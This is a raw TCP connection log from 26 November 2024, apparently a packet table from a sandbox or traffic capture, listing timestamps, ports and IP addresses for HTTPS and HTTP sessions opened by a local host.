                                                                              Nov 26, 2024 20:54:50.767543077 CET49746443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:50.807336092 CET49746443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:50.807351112 CET44349746104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:50.982136965 CET44349747104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:50.982445955 CET49747443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:50.982471943 CET44349747104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:50.983597040 CET44349747104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:50.983915091 CET49747443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:50.984054089 CET49747443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:50.984059095 CET44349747104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:50.984095097 CET44349747104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:51.029325008 CET49747443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:51.215333939 CET44349746104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:51.215406895 CET44349746104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:51.215516090 CET49746443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:51.216331959 CET49746443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:51.216348886 CET44349746104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:51.529035091 CET44349747104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:51.529267073 CET44349747104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:51.529544115 CET49747443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:51.529896021 CET49747443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:51.529906988 CET44349747104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:51.532183886 CET49725443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:51.532202959 CET44349725162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:51.532602072 CET49748443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:51.532625914 CET44349748104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:51.532705069 CET49748443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:51.532951117 CET49748443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:51.532965899 CET44349748104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:51.534142017 CET49749443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:51.534223080 CET44349749104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:51.534318924 CET49749443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:51.534507990 CET49749443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:51.534538984 CET44349749104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:52.803500891 CET44349749104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:52.803809881 CET49749443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:52.803872108 CET44349749104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:52.805002928 CET44349749104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:52.805331945 CET49749443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:52.805479050 CET49749443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:52.805490971 CET44349749104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:52.805520058 CET44349749104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:52.844454050 CET44349748104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:52.844800949 CET49748443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:52.844824076 CET44349748104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:52.845130920 CET44349748104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:52.845424891 CET49748443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:52.845490932 CET44349748104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:52.845551968 CET49748443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:52.858200073 CET49749443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:52.887332916 CET44349748104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:53.289879084 CET44349749104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:53.290107965 CET44349749104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:53.290205956 CET49749443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:53.290270090 CET44349749104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:53.290302992 CET44349749104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:53.290366888 CET49749443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:53.290821075 CET49749443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:53.290851116 CET44349749104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:53.322315931 CET44349748104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:53.322387934 CET44349748104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:53.322478056 CET49748443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:53.323518991 CET49748443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:53.323540926 CET44349748104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:53.898629904 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:53.898689032 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:53.898766994 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:53.898992062 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:53.899003983 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:54.215234041 CET4968080192.168.2.16192.229.211.108
                                                                              Nov 26, 2024 20:54:55.347217083 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:55.347510099 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:55.347527981 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:55.347862005 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:55.348253012 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:55.348315954 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:55.348326921 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:55.348336935 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:55.348398924 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:55.348409891 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:55.348421097 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:55.348428011 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:55.348522902 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:55.348534107 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.013905048 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.014143944 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.014174938 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.014198065 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.014316082 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.014316082 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.014337063 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.022649050 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.022711992 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.022720098 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.031447887 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.031518936 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.031529903 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.031539917 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.031600952 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.040275097 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.080322981 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.136929035 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.192229986 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.192246914 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.228431940 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.228512049 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.228517056 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.228527069 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.228697062 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.236553907 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.244719028 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.244755030 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.244880915 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.244891882 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.244940042 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.252748013 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.252830029 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.252902031 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.252919912 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.252932072 CET44349750104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.252958059 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.252984047 CET49750443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.255861044 CET49751443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.255964994 CET44349751104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:56.256064892 CET49751443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.256402969 CET49751443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:56.256443977 CET44349751104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:57.608745098 CET44349751104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:57.609168053 CET49751443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:57.609195948 CET44349751104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:57.609555006 CET44349751104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:57.609904051 CET49751443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:57.609998941 CET44349751104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:57.610106945 CET49751443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:57.655352116 CET44349751104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:58.074647903 CET44349751104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:58.074723005 CET44349751104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:54:58.074839115 CET49751443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:58.075757027 CET49751443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:54:58.075802088 CET44349751104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:02.449563980 CET49752443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:02.449609041 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:02.449701071 CET49752443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:02.449945927 CET49752443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:02.449963093 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:03.771891117 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:03.772244930 CET49752443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:03.772258043 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:03.772722006 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:03.773032904 CET49752443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:03.773117065 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:03.773238897 CET49752443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:03.773343086 CET49752443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:03.773381948 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:03.773472071 CET49752443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:03.773508072 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:04.563823938 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:04.563935041 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:04.563977003 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:04.564007998 CET49752443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:04.564022064 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:04.564100981 CET49752443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:04.564299107 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:04.564414978 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:04.564472914 CET49752443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:04.564623117 CET49752443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:04.564635038 CET44349752104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:04.567414045 CET49753443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:04.567470074 CET44349753104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:04.567562103 CET49753443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:04.567791939 CET49753443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:04.567806005 CET44349753104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:04.975589991 CET49754443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:04.975621939 CET44349754172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:04.975704908 CET49754443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:04.976012945 CET49754443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:04.976028919 CET44349754172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:05.778426886 CET44349753104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:05.778742075 CET49753443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:05.778767109 CET44349753104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:05.779108047 CET44349753104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:05.779500961 CET49753443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:05.779570103 CET44349753104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:05.779704094 CET49753443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:05.827342987 CET44349753104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:06.243439913 CET44349754172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:06.243871927 CET49754443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:06.243896961 CET44349754172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:06.246964931 CET44349754172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:06.247066975 CET49754443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:06.247524977 CET49754443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:06.247541904 CET49754443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:06.247607946 CET44349754172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:06.247612000 CET49754443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:06.247677088 CET49754443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:06.248003006 CET49755443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:06.248038054 CET44349755172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:06.248126030 CET49755443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:06.248348951 CET49755443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:06.248367071 CET44349755172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:06.260348082 CET44349753104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:06.260445118 CET44349753104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:06.260502100 CET49753443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:06.262800932 CET49753443192.168.2.16104.18.95.41
                                                                              Nov 26, 2024 20:55:06.262823105 CET44349753104.18.95.41192.168.2.16
                                                                              Nov 26, 2024 20:55:07.482961893 CET44349755172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:07.483350039 CET49755443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:07.483375072 CET44349755172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:07.484868050 CET44349755172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:07.484945059 CET49755443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:07.486102104 CET49755443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:07.486197948 CET44349755172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:07.486283064 CET49755443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:07.531337023 CET44349755172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:07.535629034 CET49755443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:07.535636902 CET44349755172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:07.583230019 CET49755443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:08.409395933 CET44349755172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:08.409755945 CET44349755172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:08.409826040 CET49755443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:08.410537004 CET49755443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:08.410551071 CET44349755172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:08.664532900 CET49756443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:08.664592981 CET44349756172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:08.664719105 CET49756443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:08.665014029 CET49756443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:08.665030956 CET44349756172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:09.982659101 CET44349756172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:09.982938051 CET49756443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:09.982960939 CET44349756172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:09.984431982 CET44349756172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:09.984508991 CET49756443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:09.984760046 CET49756443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:09.984817028 CET49756443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:09.984817028 CET49756443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:09.984846115 CET44349756172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:09.984908104 CET49756443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:09.985080957 CET49759443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:09.985137939 CET44349759172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:09.985220909 CET49759443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:09.985388994 CET49759443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:09.985404015 CET44349759172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:10.605808020 CET49760443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:55:10.605926991 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:10.606091022 CET49760443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:55:10.606457949 CET49760443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:55:10.606491089 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:11.290906906 CET44349759172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:11.291327000 CET49759443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:11.291357040 CET44349759172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:11.292854071 CET44349759172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:11.292932034 CET49759443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:11.293224096 CET49759443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:11.293308973 CET44349759172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:11.293375969 CET49759443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:11.293392897 CET44349759172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:11.339374065 CET49759443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:12.225996017 CET44349759172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:12.226130009 CET44349759172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:12.226201057 CET49759443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:12.227107048 CET49759443192.168.2.16172.67.189.38
                                                                              Nov 26, 2024 20:55:12.227145910 CET44349759172.67.189.38192.168.2.16
                                                                              Nov 26, 2024 20:55:12.401784897 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:12.401878119 CET49760443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:55:12.403280973 CET49760443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:55:12.403295040 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:12.403547049 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:12.404931068 CET49760443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:55:12.451340914 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:13.116405964 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:13.116489887 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:13.116535902 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:13.116679907 CET49760443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:55:13.116681099 CET49760443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:55:13.116751909 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:13.116818905 CET49760443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:55:13.155769110 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:13.155822992 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:13.155972958 CET49760443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:55:13.155972958 CET49760443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:55:13.155999899 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:13.156064034 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:13.156126976 CET49760443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:55:13.156173944 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:13.156202078 CET49760443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:55:13.156219959 CET443497604.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:55:18.166399002 CET4969980192.168.2.162.20.68.201
                                                                              Nov 26, 2024 20:55:18.287949085 CET80496992.20.68.201192.168.2.16
                                                                              Nov 26, 2024 20:55:18.288012981 CET4969980192.168.2.162.20.68.201
                                                                              Nov 26, 2024 20:55:29.039531946 CET49779443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:55:29.039572954 CET44349779172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:55:29.039694071 CET49779443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:55:29.039937019 CET49779443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:55:29.039952040 CET44349779172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:55:30.268073082 CET49780443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:30.268124104 CET4434978035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:30.268208027 CET49780443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:30.268703938 CET49780443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:30.268722057 CET4434978035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:30.411051989 CET49781443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:30.411108971 CET4434978135.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:30.411171913 CET49781443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:30.411334038 CET49782443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:30.411371946 CET4434978235.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:30.411427975 CET49782443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:30.411855936 CET49781443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:30.411891937 CET4434978135.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:30.412050009 CET49782443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:30.412062883 CET4434978235.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:30.864461899 CET44349779172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:55:30.864923954 CET49779443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:55:30.864969015 CET44349779172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:55:30.865314007 CET44349779172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:55:30.865708113 CET49779443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:55:30.865776062 CET44349779172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:55:30.919456959 CET49779443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:55:31.615051031 CET4434978035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.615410089 CET49780443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:31.615442991 CET4434978035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.615820885 CET4434978035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.616133928 CET49780443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:31.616205931 CET4434978035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.616278887 CET49780443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:31.659328938 CET4434978035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.694462061 CET4434978135.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.694868088 CET49781443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:31.694883108 CET4434978135.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.696255922 CET4434978135.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.696360111 CET49781443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:31.696734905 CET49781443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:31.696883917 CET49781443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:31.696890116 CET4434978135.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.696937084 CET4434978135.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.719202042 CET4434978235.190.80.1192.168.2.16
